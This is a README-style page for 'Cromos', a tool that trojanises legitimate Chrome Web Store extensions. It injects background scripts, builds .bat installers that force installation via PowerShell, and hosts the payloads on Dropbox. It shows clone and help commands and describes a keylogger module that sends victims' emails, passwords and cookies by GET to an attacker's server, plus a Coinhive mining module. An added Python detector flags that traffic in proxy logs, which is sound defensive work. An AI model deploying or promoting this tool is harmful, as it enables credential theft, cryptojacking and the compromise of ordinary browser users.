Cromos

Cromos is a tool for downloading legitimate extensions from the Chrome Web Store and injecting code into the background of the application. Cromos can also create executable files to force installation, for example via PowerShell, and upload files to Dropbox to host the malicious files.

  • Download extension
  • Injections
  • Upload files to Dropbox
  • Windows infection
[email protected]:~/Documents/Tools/Powershell# git clone https://github.com/fbctf/cromos.git
[email protected]:~/Documents/Tools/Powershell/cromos# python cromos.py -h

         (         )      *         )    (
   (     )\ )   ( /(    (  `     ( /(    )\ )
   )\   (()/(   )\())   )\))(    )\())  (()/(
 (((_)   /(_)) ((_)\   ((_)()\  ((_)\    /(_))
 )\___  (_))     ((_)  (_()((_)   ((_)  (_))
((/ __| | _ \   / _ \  |  \/  |  / _ \  / __|
 | (__  |   /  | (_) | | |\/| | | (_) | \__ \
  \___| |_|_\   \___/  |_|  |_|  \___/  |___/

      Version: 1.0 Builds: 1 Modules: 2

usage: python cromos.py --help

Cromos is a tool for downloading legitimate extensions of the Chrome Web Store
and inject codes in the background of the application and more cromos create
executable files to force installation via PowerShell for example, and also
upload files to dropbox to host the malicious files.

optional arguments:
  -h, --help            show this help message and exit
  --extension EXTENSION
                        Download a extension from Google Chrome Webstore
  --load LOAD           Load a script to run in background with the
                        application
  --build BUILD         Build types .bat
  --token TOKEN         Token for uploading files in Dropbox

 

Demo

This is a demonstration of the tool at work. In this example I’m downloading a famous Google extension called G Suite Training from the Chrome Web Store and injecting a keylogger module.

Modules

You can also inject some predefined modules in the background, such as a keylogger or virtual currency mining.

| Module | Description |
|---|---|
| modules/keylogger | This module captures all the passwords you type in an infected browser, whether over HTTPS or not. All you need is a server (PHP, for example) to receive the GET requests; the parameters are email, password, cookies and userAgent. |
| modules/currency | This module allows you to mine virtual coins using the Coinhive API; you just need to have an account. |
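
A defender-side check for the keylogger module's traffic as described above, added here as an example that is not part of the Cromos project: it scans web proxy logs for GET requests whose query string carries the parameter names listed in the table. The log format (`<client> <method> <url>`), the sample lines and the function names are constructed assumptions; full URLs for HTTPS traffic are only visible where the proxy inspects TLS.

```python
from urllib.parse import urlsplit, parse_qs

# Parameter names the page lists for the keylogger module's GET requests,
# lowercased so matching is case-insensitive.
KEYLOGGER_PARAMS = {"email", "password", "cookies", "useragent"}

# Constructed sample proxy log lines (assumed format: "<client> <method> <url>").
SAMPLE_LOG = """\
10.0.0.5 GET https://collector.example/log.php?email=a%40b.test&password=hunter2&cookies=sid%3D1&userAgent=Mozilla
10.0.0.5 GET https://shop.example/search?q=password+manager
10.0.0.7 GET https://login.example/reset?email=a%40b.test
10.0.0.9 POST https://login.example/session
10.0.0.9 GET http://collector.example/x?PASSWORD=pw&cookies=a%3Db
"""


def score_request(method, url):
    """Return the listed parameter names present in a GET request's query string."""
    if method.upper() != "GET":
        return set()
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name.lower() for name in query} & KEYLOGGER_PARAMS


def find_suspects(log_text, min_hits=2):
    """Return (client, host, matched_params) for GET requests that carry a
    password parameter and at least min_hits of the listed names in total."""
    suspects = []
    for line in log_text.splitlines():
        parts = line.split(None, 2)
        if len(parts) != 3:
            continue  # skip malformed lines
        client, method, url = parts
        hits = score_request(method, url)
        # A lone "email" or "q=password..." is normal traffic; a password value
        # in a URL next to cookies or userAgent is the pattern worth triage.
        if "password" in hits and len(hits) >= min_hits:
            suspects.append((client, urlsplit(url).hostname, sorted(hits)))
    return suspects


if __name__ == "__main__":
    for client, host, hits in find_suspects(SAMPLE_LOG):
        print(f"{client} -> {host}: {', '.join(hits)}")
```

The client address in each hit identifies the workstation whose installed extensions should be reviewed first.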

Disclaimer

Code samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code.
